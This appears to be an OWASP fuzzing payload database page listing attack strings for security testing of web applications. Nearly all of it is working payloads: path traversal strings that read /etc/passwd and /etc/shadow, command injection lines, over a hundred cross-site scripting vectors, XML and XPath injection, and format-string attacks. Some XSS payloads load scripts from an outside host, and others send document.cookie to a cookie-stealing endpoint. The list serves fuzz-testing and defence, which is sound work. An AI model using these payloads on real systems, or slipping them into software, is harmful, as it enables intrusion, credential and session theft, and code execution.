\..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\shadow /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow %00/etc/passwd%00 %00/etc/shadow%00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../../etc/passwd%00.html /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini \\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos; \\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos; ../../../../../../../../conf/server.xml /../../../../../../../../bin/id| C:/inetpub/wwwroot/global.asa C:\inetpub\wwwroot\global.asa C:/boot.ini C:\boot.ini ../../../../../../../../../../../../localstart.asp%00 ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../boot.ini%00 ../../../../../../../../../../../../boot.ini /./././././././././././boot.ini /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements
Testing Statements ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; '';!--"&lt;XSS&gt;=&amp;{} Common exploit code (covers a lot of XSS vulnerabilities) '&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=' "&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=" \'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\' '); alert('xss'); var x=' \\'); alert(\'xss\');var x=\' //--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83)); === XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) Statements &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt; "&lt;IMG SRC=""javascript:alert('XSS');""&gt;" &lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt; "&lt;IMG SRC=javascript:alert(""XSS"")&gt;" "&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;" "&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;" &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; "&lt;IMG SRC=""jav" "ascript:alert('XSS');""&gt;" "perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out" "perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out" "&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;" "&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;BODY onload!#$%&amp;*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;" "&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;" &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt; &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; "&lt;IMG SRC=""javascript:alert('XSS')""" &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; &lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt; "\"";alert('XSS');//" "&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;" "&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;" "&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;" &lt;BODY ONLOAD=alert('XSS')&gt; "&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;" "&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;" "&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;" "&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;" "&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;" "&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;" "&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;" &lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt; "&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;" "&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;" "&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;" "&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS" "&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;" ¼script¾alert(¢XSS¢)¼/script¾ "&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;" "&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;" "&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;" "&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;" "&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;" "&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;" "&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;" "&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;" "&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;" "&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;" "&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;" "&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;" "&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;" "&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;" "exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;" "&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;" "&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;" "&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;" &lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt; "&lt;BASE HREF=""javascript:alert('XSS');//""&gt;" "&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;" &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt; "&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;" "&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;" "&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;" "&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;" "&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;" "&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;" "&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;" "&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;" "&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;" "&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;'); ?&gt;" "&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;" "&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-" "&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;" "&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""h\ntt\tp://6" "&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;" "&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;" "&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;" "&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&amp;{document.write(""XSS-XSS-XSS"");};" "&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;" "&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;" "&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;" "&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;" "&lt;div style=""behaviour: url([link to code]);""&gt;" "&lt;div style=""binding: url([link to code]);""&gt;" "&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;" "&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;" "&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;" "&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;" "&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;" "&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;" "&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;" "&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;" "&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;" "&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;" "&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]" "&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;" "&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;" "&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;" "[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;" &gt;&lt;script&gt; "&lt;script&gt;alert(""WXSS"")&lt;/script&gt;" "&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;" &lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; '&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt; "%3cscript%3ealert(""WXSS"");%3c/script%3e" %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E &amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt; &amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert &lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt; &lt;IMG%20SRC='javascript:alert(document.cookie)'&gt; "&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;" "&lt;IMG%20SRC=""javascript:alert('WXSS')""" &lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt; &lt;IMG%20SRC=javascript:alert("WXSS")&gt; "&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;" "&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;" &lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; &lt;IMG%20SRC='javasc "&lt;IMG%20SRC=""jav" "&lt;IMG%20SRC=""jav	ascript:alert('WXSS');""&gt;" "&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;" "&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;" "&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;" "&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;" "&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;" &lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt; &lt;IMG%20SRC=javascript:alert('XSS')&gt; &lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt; &lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt; '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt; %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{} '';!--&lt;XSS&gt;=&amp;{}"

XML Attacks - (Update: 11 August 2009 - Total Statements: 15)
Statements count(/child::node) x' or name='username' or 'x'='y &lt;name&gt;','')); phpinfo; exit;/*&lt;/name&gt; &lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt; &lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt; "&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;" "&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;" "&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo &gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;" "&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo &gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;" "&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo &gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;" "&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo &gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;" "&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;" "&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;" "&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;" "&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"

Format String Statements - (Update: xx/xx/xx - Total Statements: 28)
%s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %%20d %%20n %%20x %%20s %s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% f(x)=%s x 123 f(x)=%x x 255 %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n %08x.%08x.%08x.%08x.%08x\n XXX0_%08x.%08x.%08x.%08x.%08x\n %.16705u%2\$hn \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 * id &gt; /tmp/file; exit;

Project Contributor
Project Leader: Wagner Elias

Reviewer: Eduardo Neves

Contributor: Ulisses Castro

Feedback and Participation
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org